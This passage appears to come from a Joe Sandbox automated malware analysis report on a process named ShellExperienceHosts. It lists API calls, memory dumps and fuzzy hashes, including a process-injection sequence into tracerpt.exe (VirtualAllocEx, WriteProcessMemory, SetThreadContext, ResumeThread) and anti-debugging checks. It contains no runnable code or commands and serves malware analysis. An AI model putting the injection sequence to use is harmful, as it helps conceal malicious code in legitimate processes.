                                                                            • API ID: Rect$CopySystemWindow$InfoMetricsMonitorVisible$FromIconicOffsetParametersPoint
                                                                            • String ID: ($,
                                                                            • API String ID: 388708526-170869519
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 10005849
                                                                            • _memset.LIBCMT ref: 10005868
                                                                            • _memset.LIBCMT ref: 1000589D
                                                                            • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 100058B1
                                                                              • Part of subcall function 100059E0: _vswprintf_s.LIBCMT ref: 100059F1
                                                                            • GetFileAttributesA.KERNEL32(?), ref: 100058E0
                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 10005928
                                                                            • VirtualAllocEx.KERNEL32(?,00000000,000311BF,00003000,00000040,74DF0630), ref: 1000594E
                                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 10005968
                                                                            • GetThreadContext.KERNEL32(?,?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 10005987
                                                                            • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 100059A2
                                                                            • ResumeThread.KERNEL32(?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 100059C1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                            • String ID: %s%s$D$Windows\SysWOW64\tracerpt.exe$Windows\System32\tracerpt.exe
                                                                            • API String ID: 2170139861-1986163084
                                                                            APIs
                                                                            • SetRectEmpty.USER32(?), ref: 6C720B53
                                                                            • RedrawWindow.USER32(?,00000000,00000000,00000505), ref: 6C720B71
                                                                            • ReleaseCapture.USER32 ref: 6C720B77
                                                                            • SetCapture.USER32(?), ref: 6C720B8A
                                                                            • ReleaseCapture.USER32 ref: 6C720C17
                                                                            • SetCapture.USER32(?), ref: 6C720C2A
                                                                            • SendMessageW.USER32(?,00000362,0000E001,00000000), ref: 6C720D1E
                                                                            • UpdateWindow.USER32(?), ref: 6C720DAA
                                                                            • SendMessageW.USER32(?,00000111,00000000,00000000), ref: 6C720DF9
                                                                            • IsWindow.USER32(?), ref: 6C720E05
                                                                            • IsIconic.USER32(?), ref: 6C720E10
                                                                            • IsZoomed.USER32(?), ref: 6C720E1B
                                                                            • IsWindow.USER32(?), ref: 6C720E39
                                                                            • UpdateWindow.USER32(?), ref: 6C720E95
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Capture$MessageReleaseSendUpdate$EmptyIconicRectRedrawZoomed
                                                                            • String ID:
                                                                            • API String ID: 2500574155-0
                                                                            • Opcode ID: fcde9a377bca8221b8afdf2035cb02f67f653adaf8dd2a4cf582b1d5d08b2799
                                                                            • Instruction ID: dcff7db99b1488bba8ae570bfd9d4c6310412c07fc3e39f071b92c81b9f1e3ae
                                                                            • Opcode Fuzzy Hash: fcde9a377bca8221b8afdf2035cb02f67f653adaf8dd2a4cf582b1d5d08b2799
                                                                            • Instruction Fuzzy Hash: 30C19571B006159FCF159F64CA98AAD7BB5FF49318F140279EC26AB791CB34A901CFA0
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C6E51A5,6C6E3B1C,00000003,?,00000004,6C6E3B1C), ref: 6C7A2B6A
• GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 6C7A2B7A
• EncodePointer.KERNEL32(00000000,?,6C6E51A5,6C6E3B1C,00000003,?,00000004,6C6E3B1C), ref: 6C7A2B83
• DecodePointer.KERNEL32(00000000,?,?,6C6E51A5,6C6E3B1C,00000003,?,00000004,6C6E3B1C), ref: 6C7A2B91
• GetLocaleInfoW.KERNEL32(00000000,00000004,?,00000003,?,6C6E51A5,6C6E3B1C,00000003,?,00000004,6C6E3B1C), ref: 6C7A2BC8
Strings
Memory Dump Source
• Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
• Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
Similarity
• API ID: Pointer$AddressDecodeEncodeHandleInfoLocaleModuleProc
• String ID: GetLocaleInfoEx$kernel32.dll
• API String ID: 1461536855-1547310189
• Opcode ID: 2a1678dba5230f4f1e7995729c9d2e55eb853a287d302e4e88f5f601543ea4be
• Instruction ID: 6ca97408a1436b118e82dacdabf770831515d2f6b5c1fe1882873e9aefbd2fe2
• Opcode Fuzzy Hash: 2a1678dba5230f4f1e7995729c9d2e55eb853a287d302e4e88f5f601543ea4be
• Instruction Fuzzy Hash: 09014B3560121ABBCF229FA1DE0CC9A3B79AF4A3997000531FD19D2620E735D862DBE1
APIs
Memory Dump Source
• Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
• Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
Similarity
• API ID: H_prolog3_
• String ID:
• API String ID: 2427045233-0
• Opcode ID: 7de843d756b3f95ef9a72298f0745d69ea16a0a6839b7089ec85f8ad668a8278
• Instruction ID: 6e6e61feecd403d459be611c7f49b1c4f9ef16116ace4a27f4a090bc1d4d5448
• Opcode Fuzzy Hash: 7de843d756b3f95ef9a72298f0745d69ea16a0a6839b7089ec85f8ad668a8278
• Instruction Fuzzy Hash: 3DE1C2716042159BDF11DF60CE88BED37B8BF48718F180279ED15AFA85DB309905DBA8
APIs
• GetSystemMetrics.USER32(00000017), ref: 6C6F4DED
• GetAsyncKeyState.USER32(00000001), ref: 6C6F4DFC
• WindowFromPoint.USER32(?,?), ref: 6C6F4E35
• ScreenToClient.USER32(?,?), ref: 6C6F4E83
• SendMessageW.USER32(?,?,?,00000000), ref: 6C6F4EF6
• ScreenToClient.USER32(?,?), ref: 6C6F4F63
Memory Dump Source
• Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
• Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
Similarity
• API ID: ClientScreen$AsyncFromMessageMetricsPointSendStateSystemWindow
• String ID:
• API String ID: 1550688781-0
• Opcode ID: 79d6a03ae6c75525c09d6abfeb60308cd4dd87099003760de936527ba62f9d6d
• Instruction ID: 7ba26f63a1aeba1d6c64d63cb62c600d2b1ae28e326a9eae3d3800943f152f4b
• Opcode Fuzzy Hash: 79d6a03ae6c75525c09d6abfeb60308cd4dd87099003760de936527ba62f9d6d
• Instruction Fuzzy Hash: D661A471B0121A9FDF15CF64C9449FEB7B6FF88304F144129E91AA3A50DB70A952CBD4
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
Similarity
• API ID: swprintf$_memset
• String ID: :$@
• API String ID: 1292703666-1367939426
• Opcode ID: 3ce09b44c703f379a6cffab786f078c12705430181853880a2577985a84515e9
• Instruction ID: 4eace5d007c5c9f4b83aad07d3ef02eaf5685708244b10d92b01b4cb7ab77d59
• Opcode Fuzzy Hash: 3ce09b44c703f379a6cffab786f078c12705430181853880a2577985a84515e9
• Instruction Fuzzy Hash: 73315EB6D0021CABDB14CBE9CC85FEEB7B9FB88300F504219E91AAB241E7746905CB54
APIs
• IsDebuggerPresent.KERNEL32 ref: 02237914
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02237929
• UnhandledExceptionFilter.KERNEL32(10015350), ref: 02237934
• GetCurrentProcess.KERNEL32(C0000409), ref: 02237950
• TerminateProcess.KERNEL32(00000000), ref: 02237957
Memory Dump Source
• Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID:
• API String ID: 2579439406-0
• Opcode ID: 57dfde80044b951cb17f91093e50248a3407fe2147c9df5aa397585be7e6a5f4
• Instruction ID: d0e104486307f489badf2c1b35e03d9b2ba21dc814f3655f22594bff9a54228e
• Opcode Fuzzy Hash: 57dfde80044b951cb17f91093e50248a3407fe2147c9df5aa397585be7e6a5f4
• Instruction Fuzzy Hash: 5921DFB4814224EFF702DFA9C9C96597BF5BB0A325F40D01AE5088B261EBB5D5C0CF80
APIs
• IsDebuggerPresent.KERNEL32 ref: 1000793D
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10007952
• UnhandledExceptionFilter.KERNEL32(10015350), ref: 1000795D
• GetCurrentProcess.KERNEL32(C0000409), ref: 10007979
• TerminateProcess.KERNEL32(00000000), ref: 10007980
Memory Dump Source
• Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
• String ID:
• API String ID: 2579439406-0
• Opcode ID: 57dfde80044b951cb17f91093e50248a3407fe2147c9df5aa397585be7e6a5f4
• Instruction ID: 193b6f3057f50b32987db54b87c2b31a729b11eea6cfb014211f1eca9ce5fffe
• Opcode Fuzzy Hash: 57dfde80044b951cb17f91093e50248a3407fe2147c9df5aa397585be7e6a5f4
• Instruction Fuzzy Hash: 7221AFB4818264EFF702DF68CDC96597BE5FB0A355F509019E5088B261EB75D5C0CF81
APIs
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 6C6B8545
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 6C6B85BD
  • Part of subcall function 6C6B864E: ___std_exception_copy.LIBVCRUNTIME ref: 6C6B8675
  • Part of subcall function 6C84C646: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,20000000,6C6D830C), ref: 6C84C6A7
• ___std_exception_copy.LIBVCRUNTIME ref: 6C6B8612
Strings
• Failed to calculate base64 decoded size., xrefs: 6C6B85DF
Memory Dump Source
• Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
• Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
Similarity
• API ID: BinaryCryptString___std_exception_copy$ExceptionRaise
• String ID: Failed to calculate base64 decoded size.
• API String ID: 1999913932-3365390155
• Opcode ID: 4f58b8bf4554b9b595101869390cc6bce9991d0d8d6f6cb1e25ba405812c33f7
• Instruction ID: 44781b12f5f5e729e76bb56911e955b4725a20836f6d0c402de19b78cc323fc9
• Opcode Fuzzy Hash: 4f58b8bf4554b9b595101869390cc6bce9991d0d8d6f6cb1e25ba405812c33f7
• Instruction Fuzzy Hash: FD419AF2901209AFDB20DF58CD84ADABBBCFF49318F048929E445AB751D730E954CBA5
APIs
• SetForegroundWindow.USER32(?), ref: 6C6F2E73
• IsIconic.USER32(?), ref: 6C6F2E7C
  • Part of subcall function 6C770CB0: ShowWindow.USER32(?,?,?,?,6C761B94,00000005,0000EA20), ref: 6C770CC1
• PostMessageW.USER32(?,00000000,?,00000005), ref: 6C6F2EA4
• IsIconic.USER32(?), ref: 6C6F2EAD
Memory Dump Source
• Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
• Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
Similarity
• API ID: IconicWindow$ForegroundMessagePostShow
• String ID:
• API String ID: 675533722-0
• Opcode ID: a55be4490ee1723b9e329fb2345719bc63434dade34ee2f8577dd8ce64c0cbfd
• Instruction ID: 4c0102517a7668a7c19dab929cdfaa91d6f7ab63fd307c79a9b093d18941f5eb
• Opcode Fuzzy Hash: a55be4490ee1723b9e329fb2345719bc63434dade34ee2f8577dd8ce64c0cbfd
• Instruction Fuzzy Hash: 330196327005117BDE251764DC1CE693B36EB89765B200229F9169AAD0DF219C11CB94
APIs
• OutputDebugStringA.KERNEL32(IsolationAware function called after IsolationAwareCleanup,00000000,?,6C6EED10,?,6C8D9398,00000014,6C6EEEB3,ImageList_Destroy,6C8D93D8,00000010,6C6EF180,00000000,6C6EF1C1,05BCD017,?), ref: 6C6E2FCA
• GetLastError.KERNEL32(?,00000000,?,6C6EED10,?,6C8D9398,00000014,6C6EEEB3,ImageList_Destroy,6C8D93D8,00000010,6C6EF180,00000000,6C6EF1C1,05BCD017,?), ref: 6C6E3001
  • Part of subcall function 6C6E328C: GetModuleFileNameW.KERNEL32(?,?,00000105,?,6C6EED10,?,6C8D9398,00000014,6C6EEEB3,ImageList_Destroy,6C8D93D8,00000010,6C6EF180,00000000,6C6EF1C1,05BCD017), ref: 6C6E333C
  • Part of subcall function 6C6E328C: SetLastError.KERNEL32(0000006F,?,6C6EED10,?,6C8D9398,00000014,6C6EEEB3,ImageList_Destroy,6C8D93D8,00000010,6C6EF180,00000000,6C6EF1C1,05BCD017,?), ref: 6C6E3350
Strings
• IsolationAware function called after IsolationAwareCleanup, xrefs: 6C6E2FC5
Memory Dump Source
• Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
• Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
Similarity
• API ID: ErrorLast$DebugFileModuleNameOutputString
• String ID: IsolationAware function called after IsolationAwareCleanup
• API String ID: 3265401609-2690750368
• Opcode ID: d1073161be5260dda8ecb106215a217b697dfc982e86124e7bc97d4f9bc1bcea
• Instruction ID: 462ffe933a81dbed30d1c4c88a48d741adb1aaf2132996d49ba9115df1a46b13
• Opcode Fuzzy Hash: d1073161be5260dda8ecb106215a217b697dfc982e86124e7bc97d4f9bc1bcea
• Instruction Fuzzy Hash: 41F04C3170F122474F744AA2A9449AA77B9871F78C7240537F811C3D20EB20C880CBEC
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Xinvalid_argumentstd::_swprintf
                                                                            • String ID:
                                                                            • API String ID: 2109912724-0
                                                                            • Opcode ID: fb3159d5d0cc833ea859812a30b47ed7f5190ad94b9111cceee841ddcb571069
                                                                            • Instruction ID: 1913493a21cefbc26cfaa778b1ebd3d955f72ff48cb1dd5a0aec4d64815798c9
                                                                            • Opcode Fuzzy Hash: fb3159d5d0cc833ea859812a30b47ed7f5190ad94b9111cceee841ddcb571069
                                                                            • Instruction Fuzzy Hash: 72E16675F006259FDF64DE68CC90BEEB3B5EB49301F1845E9D94AA7284D730AE818F90
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: l$ntdl
                                                                            • API String ID: 0-924918826
                                                                            • Opcode ID: c362b51c53e3eeabca090c6237b61e6bcf708d1a3817c6eecd03a2daff8ddda5
                                                                            • Instruction ID: fb6f7d32ebc5247b6ed52cae9a0725f7d04ecac94bbc9990a2a6d2f6b77daa26
                                                                            • Opcode Fuzzy Hash: c362b51c53e3eeabca090c6237b61e6bcf708d1a3817c6eecd03a2daff8ddda5
                                                                            • Instruction Fuzzy Hash: A921DFB9A00A209FCB29DF18859862FBBB6EF4D76271580A9E405DF354EB34C90297D1
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen
                                                                            • String ID:
                                                                            • API String ID: 4218353326-0
                                                                            • Opcode ID: e3df414e04acb77b8f8238edf6b2304ea9505d986fa485402ed2fcad15157fd9
                                                                            • Instruction ID: e015f25fd01e3fdc6548de8e2a5a1846fe6e0fb7606030f0a5598e2a0df900bb
                                                                            • Opcode Fuzzy Hash: e3df414e04acb77b8f8238edf6b2304ea9505d986fa485402ed2fcad15157fd9
                                                                            • Instruction Fuzzy Hash: 0E4206B2F011589FCB04CFACD8806DDBBB6EF99318F294129E415B7740D7749845CB9A
                                                                            Strings
                                                                            • 0123456789ABCDEFabcdef-+Xx, xrefs: 6C6C6A2E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                            • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                            • API String ID: 593203224-2799312399
                                                                            • Opcode ID: 14d9b767fc295ef8445d4a32bce66b29bc4723ac604c1346e000aa2766d2e63f
                                                                            • Instruction ID: d52205729ebd587e454a1e7d4590680f1a758e09a7b281294c0f9e91232149cf
                                                                            • Opcode Fuzzy Hash: 14d9b767fc295ef8445d4a32bce66b29bc4723ac604c1346e000aa2766d2e63f
                                                                            • Instruction Fuzzy Hash: 2D52C370B052889FDB05CF68C4507EDBBB2EF46318F288259D465ABB81C731D946CB9E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: cca1051eebb1169d587f4373fdd59888663e8c0004b99c560278c0417d3c94b7
                                                                            • Instruction ID: 92d736341fdfefe1520dc9386904af9f0a0b5c0dd8621808b0ecc1f50123a32a
                                                                            • Opcode Fuzzy Hash: cca1051eebb1169d587f4373fdd59888663e8c0004b99c560278c0417d3c94b7
                                                                            • Instruction Fuzzy Hash: 5112BD72E206198BDF0CCFA8D8407ECB7B2FBC8324F158669D916B7294CB756A45CB50
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: c394c455a7f2bff056411643fe4383718cef374654397aa3c9f531cf96a384d0
                                                                            • Instruction ID: 047c6c88f323fc5ab06c460dd6f244dd892c11a6ec1a435fe2328daaef5e84d1
                                                                            • Opcode Fuzzy Hash: c394c455a7f2bff056411643fe4383718cef374654397aa3c9f531cf96a384d0
                                                                            • Instruction Fuzzy Hash: 5212B872E105198BDF18CFA8D8406ECB7B2FB8C324F25866DD961FB294C7B1A945CB50
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: [RO] %ld bytes
                                                                            • API String ID: 0-772938740
                                                                            • Opcode ID: 2a08ef20fd28d4e41efb5c589b023e79d3b49b63dd55763adb9396416b1eb817
                                                                            • Instruction ID: 5f4ed6025b2df33ffe26fbfa09f8a844b0b9df8eef521221cbe303e0c6286253
                                                                            • Opcode Fuzzy Hash: 2a08ef20fd28d4e41efb5c589b023e79d3b49b63dd55763adb9396416b1eb817
                                                                            • Instruction Fuzzy Hash: 07222774A00B05DFEB64CF68C984A9ABBF1FF48344F208A6DD95A97759D730E881CB50
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
